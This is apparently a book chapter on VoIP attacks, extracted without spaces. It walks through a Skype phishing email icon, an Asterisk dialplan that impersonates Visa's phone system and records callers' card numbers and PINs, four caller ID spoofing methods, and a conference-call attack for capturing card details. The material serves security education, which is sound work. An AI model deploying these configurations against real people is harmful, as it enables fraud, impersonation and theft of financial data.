1. LoadtheAsteriskPBX.a. DownloadtheAsteriskPBXvirtualmachine(VoIPonCD-
appliance)fromhttp://www.voiponcd.com/downloads.php/.
b. DownloadVMwarePlayerfromhttp://www.vmware.com/products/free_virtualization.html/
c. UnzipVoIP-appliance.zipontoyourharddrive.d. UsingVMwarePlayer,loadVoIPonCD.
2. Backupiax.conf,sip.conf,andextensions.confontheAsteriskPBXsystemwiththefollowingcommands:
$cp/etc/asterisk/extensions.conf/etc/asterisk/extensions.original.conf$cp/etc/asterisk/sip.conf/etc/asterisk/sip.original.conf$cp/etc/asterisk/iax.conf/etc/asterisk/iax.original.conf
3. ConfiguretheAsteriskPBXsystem.a. Downloadiax.conf,sip.conf,andextensions.conffrom
http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/b. Copyallthreefilesto/etc/asterisk,overwritingthe
originals.4. RestarttheAsteriskPBXsystemwith/etc/init.d/asterisk
restart.5. DownloadtheSIPclientX-Litefrom
http://www.xten.com/index.php?menu=download/andtheIAXclientiaxCommfromhttp://iaxclient.sourceforge.net/iaxcomm/.Done!Younowhavealabsettingforthischapter.
VoIPPhishingPhishingisnothingnewtomostcomputerusers,asmessagesforViagra,stocktips,orjustanotefromtheirfavoritefriendinNigeriaisreceivedalmosteveryday.Furthermore,anyonewhoownsafaxmachinecanalsofallvictimtoaformofphishing.Whohasn'treceivedunsolicitedadvertisementsbyfax(althoughthiswasmadeillegalbytheJunkFaxPreventionActof2005)?Becauseofthesuccessofphishersandtheamountofmoneythey"earn"fordoingalmostnothing,phishingisbigbusiness,andit'sgettinglarger.Infact,emailphishingisjustanotherformofthejunkmailandadvertisementsreceivedinphysicalmailboxeseveryday.Foranyonewhoownsahome,receivingtwoorthreelettersadayfrommortgagecompaniesofferingan"unbelievable"interestrateisalmoststandard.VoIPphishingappliesanoldconcepttoanewtechnology.Inmostphishingemails,thetargetisaskedtoclickalink,anddoingsotakesthemtoaboguswebsitethatappearstobethelegitimateone.Forexample,theusercanbesenttoapagethatlookslikethePayPalsitebutisactuallyawebsitecontrolledbyanattacker.Theboguswebsitewillthenasktheuserforsometypeofinformation,suchasausername,password,orsomeotheruser-specificinformation.Onceattackerscapturethisinformation,theycanthencontroltheuser'saccountwithouttheuser'sknowledge.Theyarefreetotransfermoney,tradestocks,orevensellusers'socialsecurityinformation.
SpreadingtheMessage
VoIPphishing,alsoknownasvishing,takesthesameconceptasemailphishingbutreplacesthefakewebsitewithafakephonenumberorevenphonedestination.Forexample,emailphishingattacksmayaskyoutogotowww.visa.comtoconductbusinessconcerningyourVisacreditcard;however,whilethetextwillshowupaswww.visa.com,theactualdestinationmightbeamaliciouswebsitecontrolledbyanattacker:123.234.254.253/steal/money/from/people.html.InVoIPphishing,attackersprovidenotthelinktoamaliciouswebsitebutalegitimate-lookingphonenumber,suchasan800,888,or866numberoftheattackers'devising.Furthermore,toincreasetheappearanceofvaliditywithphonenumberbuy-inservices,attackerscanattempttobuya800/888/866numbernearthephonenumberblockofthebank/institutiontheywishtoimpersonate.Givenadirectionorrequesttocallan800,888,or866number,theendusermaybemorelikelytotrustitandmakethetelephonecall.SeeFigure7-1foranexample.Inadditiontolistingaphonenumber,attackerscanbemoresophisticatedandaddamaliciousVoIPcallicontotheemailmessage.Forexample,manyVoIPclients,suchasSkype,allowiconstobeplacedinemailmessagesorwebsitestoinitiateoutgoingVoIPcalls.Furthermore,theVoIPcalliconcancontainthelogoofthecompanytheattackerwishestoimpersonate.Oncetheuserclicksthelogo,hewillautomaticallycallthenumbercontrolledbytheattackerwhilebelievingthatheisreallycallingtheactualnumberofhiscreditcardcompany.SeeFigure7-2.
Figure7-1.VoIPphishingemail
NoticethatthemessageshowninFigure7-2containsarecognizableandseeminglytrustworthycompanylogo,suchasVisa's,aswellastextthatsays"CallFraudDetectionServicesimmediately."Auserwhoclicksthelogowillautomaticallycallanumberoftheattacker'schoice,which,obviously,isnotactuallyVisa's.TheexploitcanoccurwithanyVoIPclient;however,thisparticularexamplehasbeencustomizedforSkype.ThereasonanattackerwoulduseSkypeversusamorevulnerableVoIPclientisthesamereasonwhyemailphishersarefondofPayPal—therearemorethan7millionregisteredusers!
Figure7-2.VoIPphishingemailwithmaliciousVoIPcallicon
Among7millionregisteredSkypeusers,oneofthemisboundtoclickthattrustediconandmakethedangerouscall.TheHTMLcodeforthemaliciousVoIPiconinFigure7-2isshownhere:
<ahref="skype:+18881182006?call"><imgsrc="http://attackers.ip.address/visa.jpg"style="border:none;"/></a>
OncetheHTMLfilehasbeensaved,itcanbeinsertedasasignaturefileinthephisher'semailclient(inMicrosoftOutlook,thisisassimpleasselectingInsert►Signature►Usethisfileastemplate►Browse►VoIP.Phish.Visa.htm).Thephishercansendmillionsofemails,andeachofthemwillhavethemaliciousVoIPiconviathesignaturefile.Inthesamplecode,noticethatthefirstiteminboldistheattacker's888number.Becauseenduserstypicallydon'tmemorizethephonenumbersoftheircreditcardcompany,itwouldbedifficultforanaveragepersontodetermineifitiscorrectornotwithoutcheckingthecarditself,whichmanypeoplewillfindtoobothersometodo(especiallyiftheuserisworriedaboutheraccountandwantstocallthenumberas
soonaspossible).TheseconditemshowninboldisthelocationoftheVisaicon,whichhasbeenhostedonaservercontrolledbytheattacker.Enduserswhoclickthelogowillbeenbetakentoaphone/voicemailboxcontrolledbytheattacker,asshowninFigure7-3.
Figure7-3.Resultofuser'sclickingVoIPcallicon
ReceivingtheCalls
Ineitherofthescenariosjustdescribed,listingaphonenumberorprovidingamaliciousVoIPcalllink,oncetheusermakesthecall,hewillmostlikelyenteravoicemailsystemthatsoundsexactlylikethesystemoftheintendedtarget(thebankorcreditcardinstitution).Aftertheuserispromptedtoenterhiscreditcardnumber,PIN,andmother'smaidennamefor"verification"purposesbytheautomatedsystemcontrolledbytheattacker,theattackerhassuccessfullycarriedoutaVoIPphishingattack.Theattackerneedstoensurethatwhentheuserarrivesatthebogusdestination,thevoiceanswersystem,suchastheIVR,
bogusdestination,thevoiceanswersystem,suchastheIVR,resemblesverycloselytherealdestination'svoiceanswersystem.Forexample,everyphishsiteforVisa,MasterCard,PayPal,BankofAmerica,CharlesSchwab,Fidelity,oranyotherfinancialinstitutioncloselymirrorstherealwebsite.IfauserwenttoaPayPalsiteandsawsomethingremotelydifferent,suchasadifferentloginpage,misspelling,orjustadifferentsequenceofeventstoaccessherinformation,shemightbetippedoffthatthesiteisbogus.Similarly,VoIPphishersmustensurethatthesequenceofevents,toneofvoice,andpromptsbytheautomatedvoicemessageservicecloselymirrorthoseofthelegitimateone.Thebadnewsaboutthistaskitthatitisfairlyeasytoaccomplish.TheAsteriskPBXisabletoprovideIVRservicesforusers,andattackerscanusethisfeaturetocreatetheirownIVRsystem,ensurethatitmirrorsthe"real"automatedenvironment,anduseittoanswercalls.Asteriskisalsoabletoauto-answeraphonenumberandprovideanautomatedcomputer-generatedvoiceinavarietyofdifferenttones.Furthermore,whenusersarepromptedtoentertheircreditcardnumber,PIN,orZIPcode,theattackercansetupanautomatedmethodtorecordthisinformationwiththeAsteriskPBX,makingtheattackverysimpleandsustainableacrossanumberoftargets.NowthatwehaveshownhowtocreateaVoIPphishingemaileasily,let'sshowhowtheautomatedcallsystemcanbesetup.Inthisexample,wewillphishusers,posingasacreditcardcompany.Justasrealcreditcardcompaniesdo,wewillasktheusertoenterhiscreditcardinformationforverificationpurposes,includingthecreditcardnumberandtheuser'sZIPcodeandfour-digitPIN.Unlikerealcreditcardcompanies,though,afterattackershavegainedtheinformationtheywant,thecallwilldisconnect,aneventthatwillbeblamedonhighcallvolume.Completethefollowingexercisetosetupamini–IVR-likesystemontheinternalphoneextension867.4474(To-Phish)usingAsteriskPBX.TheexampleherewillsimplyshowhowAsteriskcanbeusedtoautomaticallyanswerphonecalls;use
Swift,atext-to-speechprogramforAsterisk,tospeaktotheuser;asktheuserforinformationsuchasacreditcardnumber;andrecordthatinformationandsaveitasafile.
1. LogintotheAsteriskserver.2. DownloadSwiftfrom
http://www.mezzo.net/asterisk/app_swift.html/andinstallitwiththefollowingcommands:
tar-xzrapp_swif-release.tgz
makeinstall
loadapp_swift.so
3. OnceSwifthasbeeninstalledcorrectly,addthefollowingtexttoextension.conf(underthe[test]realm):
[test]exten=>8674474,1,Answerexten=>8674474,2,Wait(2)exten=>8674474,3,Monitor(wav,CreditCardPhish)exten=>8674474,4,Swift(WelcometoVisaCreditCardServices)exten=>8674474,5,Swift(Pleaseenteryour16digitcreditcardnumber)exten=>8674474,6,Swift(Pleaseenteryourzipcode)exten=>8674474,7,Swift(Pleaseenteryour3-digitpincode)exten=>8674474,8,Swift(I'msorry.Duetohighcallvolume,thesystemcannotprocessyourrequest.Pleasecallagainnever)exten=>8674474,9,Swift(goodbye)exten=>8674474,10,Hangup
4. Next,usinganyphoneregisteredtotheAsteriskserver,call867.4474,aslistedintheextensions.conffile.
5. Whenthesystemanswers,typeyourcreditcardnumber,ZIPcode,andthree-digitPIN.
6. Oncetheinformationhasbeenentered,Asteriskwillrecordtheinformationintwofileslocatedin/var/spool/asterisk/monitor:CreditCardPhish-in.wavfortheinputsoundsandCreditCardPhish-out.wavfortheoutputsounds.Therecordingprocessiscontrolledbyline3,wheretheMonitoroptionisusedtorecordthecall.Allsoundsandkeytonesenteredduringthecallwillberecorded.
7. Onceusershavecompletedtheircalls,logintotheAsteriskserverandcopyalltherecordingstoaWindowsoperatingsystem.
8. Convertthekeytonesrecordedinthe.wavfilestoactualtext,numbers,orsymbols.a. OntheWindowsoperatingsystem,downloadDTMF
fromhttp://www.polar-electric.com/DTMF/Index.html/.DTMFisatoolthattakestelephoneaudiokeytonesanddisplaysthemasthetext,numbers,orsymbolstheyrepresent.
b. OpenDTMFandplaythe.wavfilerecordings(CreditCardPhish-in.wavandCreditCardPhish-out.wav).
c. OncetheaudiohasbeenplayedandheardbyDTMF,itwilldisplaythetext,asshowninFigure7-4.
Figure7-4.DTMFconvertstelephonekeytonestotext.
Done!AftersendingtheVoIPphishingemail,theattackerhasrecordedtheinformationenteredbythevictim.
MakingFreeCallsMakingfreecallsfromaPCtoanylandlineormobilephoneintheUnitedStatesortheUnitedKingdomisnotreallyasecurityattack,butitisanicelittleperkthatwillenableseveralotherattacksinthischapter.Forafewyears,themajorVoIPsoftphoneshaveprovidedfreePC-to-PCcallingbutchargeforcallsfromPCstolandlinesandmobilephones,suchasSkypeOut.UsingAsteriskPBX,theX-Litesoftclient,andVoIPBuster,freecallsfromaPCtoalandlinephonearenowpossible(butonlyforUSorUKphonenumbers).Here'showyousetitup:
1. CreateaVOIPaccountwithVoIPBuster(http://www.voipbuster.com/),downloadtheVoIPBusterclient,andcreateausernameandpasswordthatwillbeusedinSIPsessionsetup.
2. OnceanaccountwithVoIPBusterhasbeensetup,logintotheAsteriskserverandchangedirectoriestotheAsteriskfolderwithcd/etc/asterisk.
3. Openthesip.conffilein/etc/asteriskandaddthefollowingitemsattheendofthefile.MakesureyoureplacetheitemsinboldwithyourVoIPBusterusernameandpassword.
[voipbuster]type=peerhost=sip.voipbuster.comcontext=testusername=USERNAMEsecret=PASSWORD
4. Opentheextensions.conffilein/etc/asteriskandaddthefollowingitemsinthetestrealm([test]).MakesureyoureplacetheitemsinitalicwiththenumberyouwanttocallviayourSIPclient.Ourexamplewillbecallingthenumber415.118.2006.
[test]exten=>100,Dial,(SIP/Sonia)
exten=>101,Dial,(SIP/Raina)exten=>14151182006,Dial,(SIP/14151182006@voipbuster)
5. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.IfusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandenteryourVoIPBuster
username,VoIPBusterpassword,anddomain(IPaddressoftheAsteriskserver).
6. SelectOKandClose.
Done!Bydialing14151182006ontheX-LiteVoIPsoftphoneonyourPC,youwillmakeacallfromtheAsteriskPBXonyourlocalnetworktoVoIPBuster,whichwillthenroutethecalltothelandlineormobilephoneyouhavechosen.Also,thisallowstheuseofAsteriskforinternalPC-to-PCcallsaswell,suchasextensions100and101inextensions.conf,whicharelocalVoIPclientontheinternalnetwork.ItshouldbenotedthatneitherAsterisknorX-LitemustbeusedwithVoIPBuster,becauseitalsohasathickclientthatcanmakefreephonecallsforyou;however,ifyouhaveanAsteriskPBXsystemforyourinternalcalling,itisnicethatyoucanusethesamePBXforbothinternalVoIPcallsaswellasexternalcalls.InordertouseVoIPBusterdirectlyforexternalcalls,simplydownloaditsclientanduseitsclientinterface.
CallerIDSpoofingCallerIDspoofingdoesexactlywhatitsnameimplies:Itchangestheappearanceofthesourcephonenumberofatelephonecall.CallerIDspoofingcanbeinnocentenough,allowingthekidswhogrewupwith*69tofinallymakephonecallsandnotfeelbadaboutgettingscaredandhangingupatthelastsecond;however,itcanhavemanymaliciousapplicationsaswell.Forexample,thephonenumberofyourbankcanbespoofed,leadingtoanotherformofphishingattacks.Spoofingabanknumbercouldallowattackerstocallthephonenumberofeveryoneinthephonebookandimpersonateatrustedfinancialinstitution.CallerIDspoofingcanalsoforcesomeonetoansweracallfromsomeoneheorshehasbeentryingtoavoid.ThereasonCallerIDspoofingispossibleisthatimplicittrustisplacedonthesourceentity(thecaller)duringaphonecall.Forexample,whenaphonecallismade,thesourcedevice,suchasaVoIPsoftphone,willsenditssourcephonenumbertothedestinationaspartofthedatapacket.SimilartohowsourceIPaddressescanbechangedinTCP/IPheaders,thesourcephonenumbercanbechangedbytheoutgoingdeviceinaTCP/IPVoIPpacket.Intraditionalphones,suchaslandlinesormobiledevices,nouserinterface/optionallowsforthisability(forgoodreason);however,inthecomputerworld,thisisassimpleasmakingafeweditstoyoursoftphone/VoIPpacketandplacingthecall.SpoofingvaluesinTCP/IPpacketsisnothingnewandissimplycarriedovertoVoIPdatapackets.TherearemanywaystospoofCallerID,includingspecializedcallingcards,onlinecallingservices,orsimplydownloadingspecificsoftware.AquickInternetsearchwillleadtomanymethodsforspoofingCallerID;wearegoingtoshowfourspecificexamples.Thefirstexample,whichisthesimplest(fivequicksteps),usesIAXwithanIAXclientandVoIPJet(anIAXVoIPprovider).ForthosewhopreferSIPclients,thesecond
exampleusesaSIPclient,suchasX-Lite,anAsteriskserver,andVoIPJet.Thethirdexampleusesanonlineservice.Finally,thefourthexampleshowshowtoperformCallerIDspoofingonaninternalVoIPnetwork,suchasaCiscoorAvayahardphonewithAsterisk.ItshouldbenotedthatspoofingyourCallerIDisnowdefinedaspre-texting,whichisagainstthelawandcarriesseverepenalties(asnotedbythe2006Hewlett-Packardcase).
Example1
Asnotedpreviously,thereasonCallerIDspoofingworkswithiaxCommandVoIPJetisthattheinformationprovidedbythecallingentityistrusted.iaxCommofferstheabilitytochangeone'sCallerIDnumber,asnotedinstep2inthenextexercise.BecauseVoIPJetisaVoIPprovider,itistakinginformationfromasoftphoneandconvertingthatinformationtoaPBXsystemforlandlinedestinations.Becausethesoftphone(iaxComm)isnotconnectingdirectlytoaPBXsystem,VoIPJethasnochoicebutsimplytotrusttheinformationitreceivesintheTCP/IPVoIPpackets.Inthiscase,iaxCommismodifyingtheinformationbeforeitissentoverthenetwork,forcingVoIPJetandthefinaldestinationtodisplaythespoofednumber.Forthisspoofingexample,wewillneedtosetupaVoIPJetaccounttospoofourCallerIDandanIAXclient,suchasiaxComm.
1. DownloadiaxCommfromhttp://iaxclient.sourceforge.net/iaxcomm/.
2. CreateaVoIPJetaccountbyvisitinghttp://www.voipjet.com/.Theaccountgrantsyou25cents'worthofcallsforfree.
3. OnceaVoIPJetaccounthasbeensetup,youwillseeanoptioncalledClickheretoviewinstructionsonsettingupAsterisktosendcallstoVoIPJet.Selectthatoptionandnotetheinformationtobeused,asshowninFigure7-5.
Figure7-5.VoIPJetaccountinformation
4. OpeniaxCommandwiththefollowingstepsconfigureittouseVoIPJet:a. SelectOptionsfromthemenubar.b. SelectPreferencesandthentheCallerIDtab.c. OntheNumberline,entertheCallerIDnumberyou
wishtospooffrom.SeeFigure7-6.Forthisexample,wewilluse4151182006.
Figure7-6.CallerIDtabiniaxComm
d. SelectApply►Save►Done.(ExitthemenubyclickingtheXintheupperrightcorner.)
e. SelectOptionsfromthemenubar.f. SelectAccounts.g. SelectAdd.h. EntertheVoIPinformationreceivedfromVoIPJetin
Figure7-5:AccountName(VoIPJet),Host(test.voipjet.com),Username(15193),Password(7f5db6951fabfaa4).
i. SelectSave,exitthemenu,andthenselectDone.
Done!YouhavenowregisteredyouriaxCommclienttoVoIPJet.Thenextstepistodialanyten-digitphonenumber,beginningwiththenumber1(e.g.,14158675309).TypethenumberintheExtensiontextboxoniaxComm.Oncethecalltakesplace,theCallerIDnumbersetinthePreferencessectionoftheclientwillappearontheremotephone.
Example2
InordertospoofCallerIDusingaSIPclient,youmustuseanAsteriskPBXsystemwiththeVoIPJetaccount.CompletethefollowingstepstospoofCallerIDbyconnectingtheX-LiteSIPclienttoanAsteriskserverandconnectingtheAsteriskservertoVoIPJet.
1. CreateaVoIPJetaccountbyvisitinghttp://www.voipjet.com/.Theaccountgrantsyou25cents'worthofcallsforfree.
2. OnceanaccountwithVoIPJethasbeensetup,youwillseeanoptioncalledClickheretoviewinstructionsonsettingupAsterisktosendcallstoVoipJet.Selectthatoptionandnotetheinformationtobeusedintheiax.confandextensions.conffiles,asshownpreviouslyinFigure7-5.
3. ChangedirectoriestotheAsteriskfolderwiththecommandcd/etc/asterisk.
4. CopytheIAXinformationgiventoyoubyVoIPJetdirectlyintotheiax.conffile.NoticethattheinformationfromVoIPJet,showninFigure7-5,mirrorstheitemsaddedtotheiax.conffile.Also,youwillprobablyhavetologoutandthenlogbackintogettheMD5checksumneededonthesecret=line.Hereisanexampleoftheinformationenteredintoiax.conf:
[voipjet]type=peerhost=test.voipjet.comusername=15193secret=7f5db6951fabfaa4auth=md5context=default
5. CopytheextensioninformationgiventoyoubyVoIPJetdirectlyintotheextensions.conffileunderthetestrealm([test]).Unlikeiax.conf,youdon'tneedeverythinggiventoyoubyVoIPJettocompletetheproofofconceptinthisexample,justthelinesshownbelow.Additionally,makesureyoureplacetheitemsinboldwiththephonenumberyouwishtospooffrom.Forthisexample,wewillbespoofingfrom415.118.2006toany10-digitnumberthatisdialedwithaprefixof1(asshownbythe_1NXXNXXXXXXline):
exten=>_1NXXNXXXXXX,1,SetCallerID(4151182006)exten=>_1NXXNXXXXXX,2,Dial,IAX2/15193@voipjet/${EXTEN}exten=>_011.,1,SetCallerID(4151182006)
exten=>_011.,2,Dial,IAX2/15193@voipjet/${EXTEN}
6. UsingaSIPclient,suchasX-Lite,betweenyourclientandtheAsteriskserverrequiresanextrastep.Openthesip.conffileandenterthefollowinginformation,whichwillspecifyaSIPclienttoregisterwithyourAsteriskserver:
[Sonia]type=friendhost=dynamicusername=Soniasecret=123voiptestcontext=default
7. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.IfusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandentertheUsername(Sonia),
Password(123voiptest),andDomain(IPaddressoftheAsteriskserver).
d. SelectOKandClose.
Done!YouhavenowregisteredyourAsteriskservertoVoIPJet(usingIAX)andyourX-LiteclienttotheAsteriskserver(usingSIP).Thenextstepistodialany10-digitphonenumber,beginningwiththenumber1(e.g.,14158675309),ontheX-LiteSIPclient.TheCallerIDinformationwillberetrievedfromextensions.conf(iteminboldinthestep5)ontheAsteriskserver.Oncethecalltakesplace,thenumberaftertheSetCallerIDlinewillappearontheremotephone.
Example3
ThenextmethodofspoofingyourCallerIDisquitesimple.Asstatedpreviously,therearemanymethodsofspoofingaCallerID,includingtheuseofservicesprovidedonwebsiteslike
http://www.fakecaller.com/.Bythetimethisbookisreleased,thislinkmightnolongerwork,butthereareprobablytenmorejustlikeit.Regardless,whilefakecaller.comallowsyoutospoofCallerID,itallowsyouonlytoinserttexttorepeatbacktotheuser.Actualconversationscannottakeplaceusingthisservice;however,theproofofconceptisdemonstratedwellwiththewebsite.CompletethefollowingstepstospoofyourCallerIDwithfakecaller.com.Notethattheservicesendscallinformationtoathirdparty.
1. Visithttp://www.fakecaller.com/.2. TypethenumberyouwishtocallintheNumbertodialtext
box.3. Typethespoofednumber,suchas4158675309,inthe
NumbertodisplayonCallerIDtextbox.4. Typethename,suchasHackmeAmadeus,intheNameonCaller
IDtextbox.Notethatthismaynotbedisplayed.5. SelectthetypeofVoice,maleorfemaleandage,forthe
call.6. Selectthemessageyouwishtorepeatwhenthetarget
picksupthephone,suchas"I'mRickJames,bitch!"7. SelectMakethecall.
Done!Inafewseconds,thenumbershowninstep2willreceiveacall,appearingfromthenumberonstep3.Thetextshowninstep6willbespokentotheuser.
Example4
ThenextmethodofspoofingyourCallerIDtargetsaninternalnetworkusingVoIPwithSIP.Forexample,youmaywanttospoofyourCallerIDwithoutboundcallsnottolandlinesormobilephonesbutrathertoyourcubicle-matesittingrightnext
toyou.IftheenvironmentusesCiscoorAvayahardphonesthatareSIP-enabled,spoofingtheCallerIDonaninternalVoIPnetworkisalsopossible.CompletethefollowingstepstospoofyourCallerIDonyourinternalVoIPnetwork.Thetargetedphoneextensionis2222,therealphoneextensionis1111,andthespoofedphoneextensionis1108.AsteriskwillbeusedtomimicthesetupbetweenthehardphonesittingonyourdeskandtheCiscoCallManagerorAvayaCallServer.AsoftclientwillalsobeusedtoconnecttotheAsteriskservertoexecutethespoofing.
1. UnplugtheEthernetjackfromthehardphoneonyourdesk.
2. OnyourAsteriskserver,openthesip.conffileandentertheusernameandpasswordinformationforyourrealphoneextension.ThiswillenabletheAsteriskservertoregistertoCiscoCallManagerorAvayaCallServer,insteadoftothehardphoneonyourdesk.Notethatthespoofer'srealphoneextension,passcode,andthespoofednumberallneedtobeenteredcorrectly,asshownintheboldtext.Forexample,iftheVoIPphoneonthedeskhastheextensionnumberof1111andthepasscodeis1111,thenthosevaluesmustenterinthisfile,aswellastheextensionyouwishtospooffrom(inthecalleridline):
[Spoof]type=friendhost=dynamicusername=1111secret=1111context=defaultcallerid=1108
3. OnyourAsteriskserver,openthesip.conffileandenterthefollowinginformation,whichwillenableaSIPclient(suchasX-Lite)toregisterwithyourAsteriskserver:
[Sonia]type=friendhost=dynamicusername=Sonia
username=Soniasecret=123voiptestcontext=default
4. Editextensionintheextensions.conffileandaddthefollowinginformationunderthetestrealm([test]).Noticethatwhenextension2222isdialed,theCallerIDvaluewillbesetto1108,asnotedinthefirstlinehere.
exten=>2222,1,SetCallerID(4151182006)exten=>2222,2,Dial,SIP/1112@Spoof/${EXTEN}
5. UsingX-LiteoryourfavoriteVoIPSIPclient,pointyourVoIPsoftphonetotheAsteriskserver.Ifyou'reusingX-Lite,completethefollowingsteps:a. NavigatetoSIPAccountSettings.b. SelectProperties.c. SelecttheAccounttabandentertheUsername(Sonia),
Password(123voiptest),andDomain(IPaddressoftheAsteriskserver).
d. SelectOKandClose.
Done!YouhavenowregisteredyourAsteriskservertoCiscoCallManagerorAvayaCallServerandyourX-LiteclienttotheAsteriskserver(usingSIP).Thenextstepistodialthefour-digitphoneextensionof2222ontheX-LiteSIPclient.TheCallerIDinformationwillberetrievedfromextensions.conf(itemsinboldinsteps2and3)fromtheAsteriskserver.Oncethecallhasbeenplaced,thenumberaftertheCallerIDand/ortheSetCallerIDlinewillappearontheremotephone.Asyoucansee,CallerIDspoofingisquitesimple,nomatterwhichofthefourdemonstratedmethodsisused.TheabilitytospoofCallerIDhasmoreimpactthanapracticaljokeortosubvert*69,however.Forexample,creditcardcompaniesoftensendnewcreditcardsinthemailandrequireuserstousetheirhomephonenumbertoactivatethecard.Anangryneighbor,perhapsonewhohascleanedupaftertheneighbor'scatoristiredoflisteningtodogsbarkingallnight,canstealherneighbor'smailandactivateacreditcardbyspoofingthe
CallerIDsheiscallingfrom.Anotherattackinvolveslisteningtosomeoneelse'svoicemailfromhismobilephone.Inordertolistentovoicemailontheirmobilephones,mostusersselectthephone'svoicemailicon.Thisactionactuallycallstheirownnumber,whichputsthemintothevoicemailsystem.Often,usersdonotuseapasswordontheiraccount,thinkingthatthevoicemailboxcanbeaccessedonlybysomeoneholdingthephysicalphone.Iftheuserhasmadethismistake,anattackercanspooftheuser'sCallerID,callthemobilephone,andgetdirectaccesstothetarget'svoicemailsystemwithoutbeingpromptedforapassword.
AnonymousEavesdroppingandCallRedirectionMan-in-the-middleattackshaveplaguednetworksformanyyears.ToolsfromDsniff/fragroutertoCain&Abelhelpshowhownetworkcommunicationmethodsarenotsecure.Usingthesamemodel,telephonecommunicationviaVoIPcanfallintothesameproblemspace.WhileLayer2man-in-the-middleattacksusingARPpacketsarebyfartheeasiestwaytoeavesdroponacall,accesstothecorrectnetworkspaceisrequired.Unfortunately,thereareafewwaystoeavesdropwithoutusingARPpoisoning—usingcommonphishingattacksincombinationwithcallredirection.Thefirstkindofthisattackisatargetedattack,involvingCallerIDspoofing.Theattackeressentiallycreatesathree-waycallbetweenthecreditcardcompanyandthetarget,stayingonthelineasapassivelistenerandrecordingthecontent.TheattackerspoofshisCallerIDnumberastheonelistedonthebackofacreditcardoronthecreditcardcompany'swebsite.Oncethenumberhasbeenspoofed,theattackercallsthetargetononeconnection.Thetarget,believingthatthecalliscomingfromthecreditcardcompany,answersthecallthinkingitisatrustedentity.Oncethetargetanswersthecall,theattackercansendanautomatedcomputervoiceinforminghimofsupposedunusualactivityonhisaccountandaskinghimtoverifyhisinformation.Whilethemessageisplayingtothetargetononeconnection,theattackeropensanotherconnectionwiththerealcreditcardcompany.Oncethecreditcardcompanyanswersthecall,theattackercanthenconnect(three-waycallorconference)boththetargetandcreditcardcompanywhileremainingontheline.Beforedoinganythingelse,mostcreditcardcompaniesuseanautomatedcomputervoicetoverifycreditcardnumbers.Oncetheconferencehasbeenenabled,thetargetisthenaskedbytherealcreditcardcompanytoverifyhisinformationbytypingorspeakinghiscreditcardnumber,PIN,andthecard'sexpirationdate.Theattackersecretlyremainsonthecallandrecordsallthe
information.CompletethefollowingstepstoperformthisattackusingX-Lite.
1. Insteadofrepeatingsteps,completesteps1thru8from"Example2"onExample2;however,instep5,replace4151182006withthenumberonthebackofyourcreditcard.
2. OpenX-LiteandselecttheACbutton,whichshouldthenturnyellowandshowtextthatstatesAuto-conferenceenabled.ThisbuttonwillautomaticallycreateaconferencebetweenthetwolinesusedbyX-Lite.
3. Usingline1onX-Lite,callthetarget.ThiswillbeusingtheCallerIDvaluefromstep5intheearliersection.Whenthetargetanswersthephone,playapre-recordedaudiofilethatstates,"Thisisanautomatedmessage.Wehavenoticedunusualactivityinyouraccount.Pleaseremainonthelinetoverifyyourinformation."Apoorman'sapproachtorecordingthemessageistouseWindowsNarrator,whichisdescribedindetailinthenextsectionofthischapter.
4. Usingline2onX-Lite,callthecreditcardcompany.Oncethecreditcardcompanypicksupthecall,X-Liteimmediatelyconferencesallthelinestogether(theAuto-Conferenceoptionwasenabledinstep2).Thetargetwillthenbelisteningtotherealcreditcardcompanyandbepromptedforverificationinformation.
5. OnX-Lite,clicktheRecordbutton.Allinformationfromthetargettothecreditcardcompanywillnowberecordedbytheattackerandcanbeusedtocompromisethetarget'saccount.
Thesecondmethodofperformingthisattacktakesnotatargetedapproachbutawiderapproachforitstarget.ThisattackwasfirstmentionedbyJayShulmanatBlackHat2006.
Theattackersendsaphishingemailsimilartotheoneshownpreviouslyinthischapter.Whenanendusercallsthenumbershowninthephishingemail,theattackeropensasecondconnectiontotheactualcreditcardcompany.Insteadofansweringthecalldirectly,theattackerconnectstheenduserwiththerealcreditcardcompany;however,theattackerremainsontheline.Whentheuserisaskedbythecreditcardcompanytoverifyherinformationbyenteringorspeakinghercreditcardnumber,PIN,andthecard'sexpirationdate,theattacker,havingremainedonthecall,capturestheinformation.
SpamOverInternetTelephonyRemembertheolddayswhenyoucouldjustselectanddeleteallthespammessagesinyourinbox?HowaboutwhenyoucouldjustgotoyourJunkemailfolderandsimplydeleteitscontentswithjustoneclick?Nowthinkofhavingmorethanahundredvoicemailmessages(orthemaximumcapacityofyourvoicemailbox)onyourmobilephone.Couldyoudeleteallofthemwithjustafewclicksonyourphone?Furthermore,whatwouldyoudowhenlegitimateuserswhoaretryingtoleaveyouamessagearenotabletoleaveyouone,suchas"MyflightfromO'Haregotcanceledbecausesomeonesawacloud400milesawayfromtheairport,sopickmeupfromSJCat9PMinsteadofSFOat5PM"?Howdisruptivewouldtheseissuesbetoyourlifecomparedwiththe300emailmessagesfromtheCrownPrinceofNigeria?TheideaofSPITisnothingnew,astelemarketersalreadyuseautomatedtechnologytocallhomeuserstosellproductsandgoods.Furthermore,manyorganizationswillprovidethisserviceforasmallcharge,suchashttp://www.call-em-all.com/,whichallowsaspammertosendmorethan1,000peopleapre-recordedvoicemailforunder$100.However,withVoIP,notonlycanhundredsofpre-recordedmessagesbesentouttoanyphoneorvoicemailsysteminthecountry,thesemessagescanalsobefreeandhardtotrace,whichmakestheNationalDoNotCallRegistryalessermitigationstrategy.WhileeveryonelovestheirfavoriteRepublican,Democrat,orindependentpoliticalcandidatecallingthemonElectionDay,wouldtheyenjoyreceivingthosemessageseverydayfromananonymousseller?Inactuality,ananonymousspammermaybebetterthanwhatcouldbedonewiththetrueabuseofSPIT.Forfinancialgain,anattackercouldmimictheautomatedfrauddetectionservicethatcreditcardcompaniesoftenuse.Whenthecreditcardcompanydetectsanunusualcharge,anautomatedvoicecallexecutestothephonenumberlistedfortheaccountholder.
